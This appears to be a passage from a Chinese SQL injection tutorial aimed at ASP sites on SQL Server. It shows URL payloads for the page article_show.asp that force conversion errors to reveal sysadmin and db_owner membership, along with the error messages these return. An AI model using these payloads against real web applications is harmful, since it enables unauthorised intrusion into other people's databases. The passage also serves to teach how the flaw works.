基于SQL Server的WEB应用程序注入攻击

Microsoft OLE DB Provider for ODBC Drivers 错误 80040e07

[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 sitelog 转换为数据类型为 int 的列时发生语法错误。

测试当前用户是否为“sysadmin”组成员

SELECT IS_SRVROLEMEMBER(sysadmin)这句SQL语句可用来测试当前登录的用户是否为sysadmin的服务器角色，如果是将返回值1，不是的话返回值0。这里要将其转变为字符型数据才能看到具体数值。因此写下面的URL：（其中char(115)为字符’s’，%2B为加号(+)的UTF-8编码。）

article_show.asp?ID=(SELECT CHAR(115) %2B CAST(IS_SRVROLEMEMBER(sysadmin) AS VARCHAR(2)))

Microsoft OLE DB Provider for ODBC Drivers 错误 80040e07

[Microsoft][ODBC SQL Server Driver][SQL Server]将 varchar 值 s0 转换为数据类型为 int 的列时发生语法错误。

如果显示s0则不是’sysadmin’组成员，如果是’1’是’sysadmin’组成员。

测试当前用户是否为“db_owner”组成员。

article_show.asp?ID=(SELECT CHAR(115) %2B CAST(IS_MEMBER(db_owner) AS VARCHAR(2)))

Microsoft OLE DB Provider for ODBC Drivers 错误 80040e07

[Microsoft][ODBC SQL Server Driver][SQL Server]将 varchar 值 s1 转换为数据类型为 int 的列时发生语法错误。